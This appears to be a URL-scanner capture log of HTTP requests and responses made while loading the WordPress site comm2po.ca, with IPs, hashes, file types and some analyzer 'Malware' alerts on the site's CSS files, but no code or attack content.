Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 18 Aug 2015 01:04:48 GMT
etag: "1561d16-167-51d8b81268c00-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 154
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/wpml-cms-nav/res/css/cms-navigation-base.css?ver=1.4.7
72.167.59.18 200 OK 842 B URL HTTP/2 www.comm2po.ca/wp-content/plugins/wpml-cms-nav/res/css/cms-navigation-base.css?ver=1.4.7
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with CRLF line terminators
Hash 6d697557b379a8be1642c819589f2019
1c652197dc61b1841f7e0275964b6bda13d54bed
6b3eb47cf2ab9da6f7de8a969d16006529e27419ffea36315639254b398d212b
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/wpml-cms-nav/res/css/cms-navigation-base.css?ver=1.4.7 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 18 Aug 2015 01:04:48 GMT
etag: "1561d14-b8e-51d8b81268c00-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 842
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
secure.leadforensics.com/js/147022.js
51.140.49.131 200 OK 136 B URL HTTP/1.1 secure.leadforensics.com/js/147022.js
IP 51.140.49.131:0
ASN #8075 MICROSOFT-CORP-MSN-AS-BLOCK
File type ASCII text, with no line terminators
Hash bb5bd93a4a1897303df838a0d514d877
6fef6703a36252ae2eea0126fd9bb8dc85b61f85
c3dcfc6bd153ed707bc55c33d9aad508a355322780b88334a84285646379d1c7
GET /js/147022.js HTTP/1.1
Host: secure.leadforensics.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate
Pragma: no-cache
Content-Type: text/javascript
Content-Encoding: gzip
Expires: 0
Vary: Accept-Encoding
Server: Kestrel
Request-Context: appId=cid-v1:abe8a76f-f1a2-4b2e-9017-0ea36ffb5c20
Date: Wed, 21 Sep 2022 04:23:38 GMT
Content-Length: 136
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 472 B IP 142.250.74.3:0
Hash e5d7d983b288c67e17280c6a1c0d80d9
8a1e575f8b8427e872c1e4c5645d9ce3e5445e52
a08530049c460e7e3cf236a9969b94b4a794d83f3f4279ac43934194f39dedd6
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:39 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
www.comm2po.ca/wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.4.8.1
72.167.59.18 200 OK 9.2 kB URL HTTP/2 www.comm2po.ca/wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.4.8.1
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type Unicode text, UTF-8 text, with very long lines (5178), with CRLF line terminators
Hash 3361badac89380e79f6dd34bd51d722a
488ceadd2b9826c4e5aec9cbeb8078c186ee572a
e7514c616f3900dabb277526aea07b2d388be4e0ba0cc90f1a3b6463fe3d75de
GET /wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.4.8.1 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Mon, 11 Mar 2019 16:03:01 GMT
etag: "1561498-9b8c-583d3b4f75740-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 9214
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/wpml-cms-nav/res/css/cms-navigation.css?ver=1.4.7
72.167.59.18 200 OK 632 B URL HTTP/2 www.comm2po.ca/wp-content/plugins/wpml-cms-nav/res/css/cms-navigation.css?ver=1.4.7
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with CRLF line terminators
Hash 37b95dba55f47577453aeec1c54578e3
f1e14c33378ffda2923adea90c2283deedcf68f1
ed4aeaeb3c043a422cde365755f5a9a4494f175bb99a2c09fbedc661c3d4b2c5
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/wpml-cms-nav/res/css/cms-navigation.css?ver=1.4.7 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 18 Aug 2015 01:04:48 GMT
etag: "1561d15-abb-51d8b81268c00-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 632
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
fonts.googleapis.com/css?family=Playfair+Display%3A400%2C700%2C400italic%2C700italic%2C900italic&ver=1.0
142.250.74.10 200 OK 1.1 kB URL HTTP/2 fonts.googleapis.com/css?family=Playfair+Display%3A400%2C700%2C400italic%2C700italic%2C900italic&ver=1.0
IP 142.250.74.10:0
Hash cfed9daefa6e2bc54f227ddf2c78146a
1b194a8fc484b052cc6db2682d12362062a225df
a2e1193805c46d917537bc386ba6070aa66fa65203d5ba124b08df8e58f96f5a
GET /css?family=Playfair+Display%3A400%2C700%2C400italic%2C700italic%2C900italic&ver=1.0 HTTP/1.1
Host: fonts.googleapis.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: text/css; charset=utf-8
access-control-allow-origin: *
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
strict-transport-security: max-age=31536000
expires: Wed, 21 Sep 2022 04:23:39 GMT
date: Wed, 21 Sep 2022 04:23:39 GMT
cache-control: private, max-age=86400
cross-origin-opener-policy: same-origin-allow-popups
cross-origin-resource-policy: cross-origin
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
r3.o.lencr.org/
23.36.77.32 200 OK 503 B IP 23.36.77.32:0
ASN #20940 Akamai International B.V.
Hash 8ebb267e443b81854ef9a01b3eb6489d
b932e9e5679da5a9160da5429458041765509b52
4ac5aa5b4fb4a85282b825c5c0ed7b1aaf2b39ffe77d69dec5123a84709f3fe2
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "4AC5AA5B4FB4A85282B825C5C0ED7B1AAF2B39FFE77D69DEC5123A84709F3FE2"
Last-Modified: Tue, 20 Sep 2022 22:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=14479
Expires: Wed, 21 Sep 2022 08:24:58 GMT
Date: Wed, 21 Sep 2022 04:23:39 GMT
Connection: keep-alive
r3.o.lencr.org/
23.36.77.32 200 OK 503 B IP 23.36.77.32:0
ASN #20940 Akamai International B.V.
Hash 8ebb267e443b81854ef9a01b3eb6489d
b932e9e5679da5a9160da5429458041765509b52
4ac5aa5b4fb4a85282b825c5c0ed7b1aaf2b39ffe77d69dec5123a84709f3fe2
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "4AC5AA5B4FB4A85282B825C5C0ED7B1AAF2B39FFE77D69DEC5123A84709F3FE2"
Last-Modified: Tue, 20 Sep 2022 22:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=14479
Expires: Wed, 21 Sep 2022 08:24:58 GMT
Date: Wed, 21 Sep 2022 04:23:39 GMT
Connection: keep-alive
r3.o.lencr.org/
23.36.77.32 200 OK 503 B IP 23.36.77.32:0
ASN #20940 Akamai International B.V.
Hash 8ebb267e443b81854ef9a01b3eb6489d
b932e9e5679da5a9160da5429458041765509b52
4ac5aa5b4fb4a85282b825c5c0ed7b1aaf2b39ffe77d69dec5123a84709f3fe2
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "4AC5AA5B4FB4A85282B825C5C0ED7B1AAF2B39FFE77D69DEC5123A84709F3FE2"
Last-Modified: Tue, 20 Sep 2022 22:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=14479
Expires: Wed, 21 Sep 2022 08:24:58 GMT
Date: Wed, 21 Sep 2022 04:23:39 GMT
Connection: keep-alive
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fecaa9082-610c-41c1-ae9a-e453d87828ab.jpeg
34.120.237.76 200 OK 10 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fecaa9082-610c-41c1-ae9a-e453d87828ab.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash dab1f2cd68979d2004ba4449d759a341
54ed14436a75ba2aeb8459bad2ce70229aff4203
e782fb5ede547e1b167719068c6821c62414dcb0991bf9ac38285cb3ce8894e3
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fecaa9082-610c-41c1-ae9a-e453d87828ab.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 10038
x-amzn-requestid: 4cf38a70-a706-4e6a-b854-9404727c599d
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: Yxy1mHDCIAMF5-g=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-632a31bd-5aba5b0640221b302a19781b;Sampled=0
x-amzn-remapped-date: Tue, 20 Sep 2022 21:33:49 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: hDCOWNm2vFa9h7BffUJwcwZ6i27jM2qBuSTasH9q_wsQ9oNWhVpQCg==
via: 1.1 5ab5dc09da67e3ea794ec8a82992cc88.cloudfront.net (CloudFront), 1.1 cd858042f70b416ca05e042acf3908a4.cloudfront.net (CloudFront), 1.1 google
date: Tue, 20 Sep 2022 21:47:24 GMT
etag: "54ed14436a75ba2aeb8459bad2ce70229aff4203"
content-type: image/jpeg
age: 23775
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F62f1d773-46e0-4cf2-8178-3101a22f8b0c.jpeg
34.120.237.76 200 OK 7.1 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F62f1d773-46e0-4cf2-8178-3101a22f8b0c.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash c92f202bddcfee6efac41bcc25be5745
9d297544318ff34f839678d8b358290ab6bd62a8
f471aaff7c08c60905cff5b1c9d4b669a3179574493d23d27e681110688af6b2
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F62f1d773-46e0-4cf2-8178-3101a22f8b0c.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 7060
x-amzn-requestid: 69e8f4d4-2360-4124-a9e9-9cce3dd43da7
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: Yx0NWEgmIAMFusQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-632a33ee-0f4861c226117d70664b8612;Sampled=0
x-amzn-remapped-date: Tue, 20 Sep 2022 21:43:10 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: kj4FQUvvo13Yrwu_bKqee64IMn6X0UXlOJQ3fh40qejOi-3dtCrEYg==
via: 1.1 8dbfaf7df256a75768461d934659b6b2.cloudfront.net (CloudFront), 1.1 35575576af8067e30cfb17c6b9fde8e2.cloudfront.net (CloudFront), 1.1 google
date: Tue, 20 Sep 2022 21:55:57 GMT
age: 23262
etag: "9d297544318ff34f839678d8b358290ab6bd62a8"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fe6be1360-d048-4319-9cac-dfebe92db87f.jpeg
34.120.237.76 200 OK 9.3 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fe6be1360-d048-4319-9cac-dfebe92db87f.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 267173c6b4e4e6ae4a84dc08df92f82f
4183102af1963e1edb3aa572c43aeda7d855e9f5
20487bb2e59f2e6afcaaac3e3c4f1dfec9a8ef761403a44f7f92a6b57d143714
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fe6be1360-d048-4319-9cac-dfebe92db87f.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 9271
x-amzn-requestid: b8139dfc-8f24-41e0-9948-56bad215416c
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: Yx0Q-EkZoAMF_sw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-632a3406-4365026f7f832cee0c12e4d7;Sampled=0
x-amzn-remapped-date: Tue, 20 Sep 2022 21:43:34 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: rUeMyRv1DxHKmRAc4s-8GkQELQtAO-_lKHB2tjRYSQUSBMJMmDAZcQ==
via: 1.1 28a7186077f9b5270d98dd053f31303e.cloudfront.net (CloudFront), 1.1 707e733794d52100fde0ab21bf0b1462.cloudfront.net (CloudFront), 1.1 google
date: Tue, 20 Sep 2022 21:56:09 GMT
age: 23250
etag: "4183102af1963e1edb3aa572c43aeda7d855e9f5"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
fonts.googleapis.com/css?family=Raleway%3A400%2C300%2C200%2C100%2C500%2C600%2C700%2C800%2C900&ver=1.0
142.250.74.10 200 OK 7.6 kB URL HTTP/2 fonts.googleapis.com/css?family=Raleway%3A400%2C300%2C200%2C100%2C500%2C600%2C700%2C800%2C900&ver=1.0
IP 142.250.74.10:0
Hash dba3112deb85911d98a8113b74d02205
ec18149199f2c830fb4ec9c108882c4cecfcd9ab
b82bb028ec69a106589d6005c933d1241cdcdcf2d5570095b978d64aa04859b7
GET /css?family=Raleway%3A400%2C300%2C200%2C100%2C500%2C600%2C700%2C800%2C900&ver=1.0 HTTP/1.1
Host: fonts.googleapis.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: text/css; charset=utf-8
access-control-allow-origin: *
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
strict-transport-security: max-age=31536000
expires: Wed, 21 Sep 2022 04:23:39 GMT
date: Wed, 21 Sep 2022 04:23:39 GMT
cache-control: private, max-age=86400
cross-origin-opener-policy: same-origin-allow-popups
cross-origin-resource-policy: cross-origin
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fa6b35a1c-f445-4b05-b56e-ce2ad0ef2a9a.jpeg
34.120.237.76 200 OK 6.9 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fa6b35a1c-f445-4b05-b56e-ce2ad0ef2a9a.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 8bae3a7a80ff40df1d701dfc925ddeff
91df60162a8322469cada0dd8eb93619f28aec1a
fab10c7ad4658bc191621d9f2042236a7b6e34448ce5215dde5b8d6a64b52952
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fa6b35a1c-f445-4b05-b56e-ce2ad0ef2a9a.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 6897
x-amzn-requestid: 280a2e44-c21a-4d78-991b-3328e816d045
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: YwWSpE0SoAMFaxw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63299daa-55cb53491be78c4d5bed0462;Sampled=0
x-amzn-remapped-date: Tue, 20 Sep 2022 11:02:02 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: eNkM22Xu--qgJdsrH-UrTG5-Ie4nAsyLjiMaJ5ZKIz0bbw7cYrvFjw==
via: 1.1 0c96ded7ff282d2dbcf47c918b6bb500.cloudfront.net (CloudFront), 1.1 32d624dbeb2a8b7f24dbe49007e37c90.cloudfront.net (CloudFront), 1.1 google
date: Wed, 21 Sep 2022 02:18:26 GMT
age: 7513
etag: "91df60162a8322469cada0dd8eb93619f28aec1a"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fa2a425d5-4fbd-4af0-a85b-75f0878759cb.jpeg
34.120.237.76 200 OK 7.5 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fa2a425d5-4fbd-4af0-a85b-75f0878759cb.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Hash 4d98acc059a69d51165fb5e0c7430ea3
09bd3300d710c3212483159f8398b84cde09da26
6e38bbb5c79c4f714973e10961d7bad9e7ae8711cf24d68b13a77206f474d2a6
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fa2a425d5-4fbd-4af0-a85b-75f0878759cb.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 7507
x-amzn-requestid: 2a40c792-8b1b-4476-92de-1fce3df48fc1
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: YcCmaHefoAMF4Ow=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63217e28-6b05350006b7f3fb73d1e37a;Sampled=0
x-amzn-remapped-date: Wed, 14 Sep 2022 07:09:28 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: rq4QHCD4EubBKHyCj7jyKqpct5d7U33TvNufqj_w8mWunqQsouoh7w==
via: 1.1 c7c3cdef911c9ee3c1a83a78f425dc5a.cloudfront.net (CloudFront), 1.1 32d624dbeb2a8b7f24dbe49007e37c90.cloudfront.net (CloudFront), 1.1 google
date: Tue, 20 Sep 2022 22:21:54 GMT
age: 21705
etag: "09bd3300d710c3212483159f8398b84cde09da26"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
www.comm2po.ca/wp-includes/css/dashicons.min.css?ver=5.4.2
72.167.59.18 200 OK 28 kB URL HTTP/2 www.comm2po.ca/wp-includes/css/dashicons.min.css?ver=5.4.2
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (47523)
Hash 467901af02adfb156cdae788ea9e75c9
11a90496b235b04b734018acc1f58c16c75100a5
ce8b34d464d23afa7de1a95c112d0b68a184fde42abf574a45d44b6bcd744236
Analyzer Verdict Alert fortinet Malware
GET /wp-includes/css/dashicons.min.css?ver=5.4.2 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Wed, 15 May 2019 16:08:57 GMT
etag: "fe16d5-b9c6-588ef5dded840-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 28359
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/cf7-conditional-fields/style.css?ver=1.9.9
72.167.59.18 200 OK 460 B URL HTTP/2 www.comm2po.ca/wp-content/plugins/cf7-conditional-fields/style.css?ver=1.9.9
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
Hash c0ee0b15ff116252262802786cf6fd32
b589fc4077e0d845e0171e4d702e28602e88e0ce
0d0941d884cfe555f99f23140019c2157f09f57a4f69121a13a56dd7b44da5d8
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/cf7-conditional-fields/style.css?ver=1.9.9 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
